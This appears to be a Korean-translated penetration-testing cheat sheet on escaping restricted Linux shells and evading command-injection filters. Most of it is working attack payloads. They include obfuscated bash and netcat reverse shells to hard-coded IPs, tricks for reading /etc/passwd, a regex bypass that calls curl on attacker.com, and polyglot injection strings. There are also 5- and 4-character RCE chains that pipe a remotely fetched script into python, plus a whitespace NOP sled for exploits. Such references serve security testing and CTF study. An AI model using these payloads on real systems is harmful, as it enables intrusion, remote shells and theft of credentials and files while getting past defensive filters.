리눅스 제한 우회

일반적인 제한 우회

리버스 셸

# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
# echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h

짧은 Rev 셸

#Trick from Dikline
#Get a rev shell with
(sh)0>/dev/tcp/10.10.10.10/443
#Then get the out of the rev shell executing inside of it:
exec >&0

우회 경로 및 금지된 단어

# Question mark binary substitution
/usr/bin/p?ng # /usr/bin/ping
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost

# Wildcard(*) binary substitution
/usr/bin/who*mi # /usr/bin/whoami

# Wildcard + local directory arguments
touch -- -la # -- stops processing options after the --
ls *
echo * #List current files and folders with echo and wildcard

# [chars]
/usr/bin/n[c] # /usr/bin/nc

# Quotes
'p'i'n'g # ping
"w"h"o"a"m"i # whoami
ech''o test # echo test
ech""o test # echo test
bas''e64 # base64

#Backslashes
\u\n\a\m\e \-\a # uname -a
/\b\i\n/////s\h

# $@
who$@ami #whoami

# Transformations (case, reverse, base64)
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case
$(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)
$(rev<<<'imaohw') #whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64

# Execution through $0
echo whoami|$0

# Uninitialized variables: A uninitialized variable equals to null (nothing)
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters

# New lines
p\
i\
n\
g # These 4 lines will equal to ping

# Fake commands
p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown

# Concatenation of strings using history
!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command
mi # This will throw an error
whoa # This will throw an error
!-1!-2 # This will execute whoami

금지된 공백 우회

# {form}
{cat,lol.txt} # cat lol.txt
{echo,test} # echo test

# IFS - Internal field separator, change " " for any other character ("]" in this case)
cat${IFS}/etc/passwd # cat /etc/passwd
cat$IFS/etc/passwd # cat /etc/passwd

# Put the command line in a variable and then execute it
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
#  Other way, just change each space for ${IFS}
echo${IFS}test

# Using hex format
X=$'cat\x20/etc/passwd'&&$X

# Using tabs
echo "ls\x09-l" | bash

# Undefined variables and !
$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
uname!-1\-a # This equals to uname -a

백슬래시 및 슬래시 우회

cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

파이프 우회

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

16진수 인코딩을 통한 우회

echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
cat `xxd -r -p <<< 2f6574632f706173737764`
xxd -r -ps <(echo 2f6574632f706173737764)
cat `xxd -r -ps <(echo 2f6574632f706173737764)`

IP 우회

# Decimal IPs
127.0.0.1 == 2130706433

시간 기반 데이터 유출

time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi

환경 변수에서 문자 가져오기

echo ${LS_COLORS:10:1} #;
echo ${PATH:0:1} #/

DNS 데이터 유출

예를 들어 burpcollab 또는 pingb를 사용할 수 있습니다.

내장 명령어

외부 함수를 실행할 수 없고 RCE를 얻기 위해 제한된 내장 명령어 집합에만 접근할 수 있는 경우, 이를 수행하기 위한 몇 가지 유용한 요령이 있습니다. 일반적으로 모든 내장 명령어를 사용할 수 없으므로, 감옥을 우회하기 위해 모든 옵션을 알아야 합니다. 아이디어는 devploit에서 가져왔습니다.
먼저 모든 셸 내장 명령어를 확인하세요. 그런 다음 여기에 몇 가지 추천 사항이 있습니다:

# Get list of builtins
declare builtins

# In these cases PATH won't be set, so you can try to set it
PATH="/bin" /bin/ls
export PATH="/bin"
declare PATH="/bin"
SHELL=/bin/bash

# Hex
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")

# Input
read aaa; exec $aaa #Read more commands to execute and execute them
read aaa; eval $aaa

# Get "/" char using printf and env vars
printf %.1s "$PWD"
## Execute /bin/ls
$(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls
## To get several letters you can use a combination of printf and
declare
declare functions
declare historywords

# Read flag in current dir
source f*
flag.txt:1: command not found: CTF{asdasdasd}

# Read file with read
while read -r line; do echo $line; done < /etc/passwd

# Get env variables
declare

# Get history
history
declare history
declare historywords

# Disable special builtins chars so you can abuse them as scripts
[ #[: ']' expected
## Disable "[" as builtin and enable it as script
enable -n [
echo -e '#!/bin/bash\necho "hello!"' > /tmp/[
chmod +x [
export PATH=/tmp:$PATH
if [ "a" ]; then echo 1; fi # Will print hello!

폴리글롯 명령 주입

1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/

잠재적인 정규 표현식 우회

# A regex that only allow letters and numbers might be vulnerable to new line characters
1%0a`curl http://attacker.com`

Bashfuscator

# From https://github.com/Bashfuscator/Bashfuscator
./bashfuscator -c 'cat /etc/passwd'

5자 RCE

# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
#Oragnge Tsai solution
## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
http://host/?cmd=>ls\
http://host/?cmd=ls>_
http://host/?cmd=>\ \
http://host/?cmd=>-t\
http://host/?cmd=>\>g
http://host/?cmd=ls>>_

## Step2: generate `curl orange.tw|python` to file "g"
## by creating the necesary filenames and writting that content to file "g" executing the previous generated file
http://host/?cmd=>on
http://host/?cmd=>th\
http://host/?cmd=>py\
http://host/?cmd=>\|\
http://host/?cmd=>tw\
http://host/?cmd=>e.\
http://host/?cmd=>ng\
http://host/?cmd=>ra\
http://host/?cmd=>o\
http://host/?cmd=>\ \
http://host/?cmd=>rl\
http://host/?cmd=>cu\
http://host/?cmd=sh _
# Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file

## Finally execute the file "g"
http://host/?cmd=sh g


# Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"
https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
## Execute tar command over a folder
http://52.199.204.34/?cmd=>tar
http://52.199.204.34/?cmd=>zcf
http://52.199.204.34/?cmd=>zzz
http://52.199.204.34/?cmd=*%20/h*

# Another curiosity if you can read files of the current folder
ln /f*
## If there is a file /flag.txt that will create a hard link
## to it in the current folder

4자 RCE

# In a similar fashion to the previous bypass this one just need 4 chars to execute commands
# it will follow the same principle of creating the command `ls -t>g` in a file
# and then generate the full command in filenames
# generate "g> ht- sl" to file "v"
'>dir'
'>sl'
'>g\>'
'>ht-'
'*>v'

# reverse file "v" to file "x", content "ls -th >g"
'>rev'
'*v>x'

# generate "curl orange.tw|python;"
'>\;\\'
'>on\\'
'>th\\'
'>py\\'
'>\|\\'
'>tw\\'
'>e.\\'
'>ng\\'
'>ra\\'
'>o\\'
'>\ \\'
'>rl\\'
'>cu\\'

# got shell
'sh x'
'sh g'

Read-Only/Noexec/Distroless Bypass

파일 시스템에 읽기 전용 및 noexec 보호가 있거나 심지어 distroless 컨테이너에 있는 경우에도 임의의 바이너리, 심지어 셸을 실행할 수 있는 방법이 여전히 있습니다!:

{{#ref}} bypass-fs-protections-read-only-no-exec-distroless/ {{#endref}}

Chroot & other Jails Bypass

{{#ref}} ../privilege-escalation/escaping-from-limited-bash.md {{#endref}}

Space-Based Bash NOP Sled ("Bashsledding")

취약점이 system() 또는 다른 셸에 도달하는 인수를 부분적으로 제어할 수 있게 해줄 때, 실행이 페이로드를 읽기 시작하는 정확한 오프셋을 알지 못할 수 있습니다. 전통적인 NOP 슬레드(예: \x90)는 셸 구문에서 작동하지 않지만, Bash는 명령을 실행하기 전에 선행 공백을 무해하게 무시합니다.

따라서 실제 명령 앞에 긴 공백 또는 탭 문자의 시퀀스를 접두사로 추가하여 Bash용 NOP 슬레드를 만들 수 있습니다:

# Payload sprayed into an environment variable / NVRAM entry
"                nc -e /bin/sh 10.0.0.1 4444"
# 16× spaces ───┘ ↑ real command

만약 ROP 체인(또는 다른 메모리 손상 원시)이 명령 포인터를 공간 블록 내의 어느 곳에나 위치시키면, Bash 파서는 단순히 공백을 건너뛰고 nc에 도달하여 명령을 신뢰성 있게 실행합니다.

실용적인 사용 사례:

1. 메모리 매핑된 구성 블롭(예: NVRAM)으로 프로세스 간에 접근 가능.
2. 공격자가 페이로드를 정렬하기 위해 NULL 바이트를 쓸 수 없는 상황.
3. 오직 BusyBox ash/sh만 사용 가능한 임베디드 장치 – 이들은 또한 선행 공백을 무시합니다.

🛠️ 이 트릭을 system()을 호출하는 ROP 가젯과 결합하여 메모리 제약이 있는 IoT 라우터에서 익스플로잇의 신뢰성을 극적으로 증가시킵니다.

참고 문헌 및 추가 자료

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits

• https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet

• https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0

• https://www.secjuice.com/web-application-firewall-waf-evasion/

• Exploiting zero days in abandoned hardware – Trail of Bits blog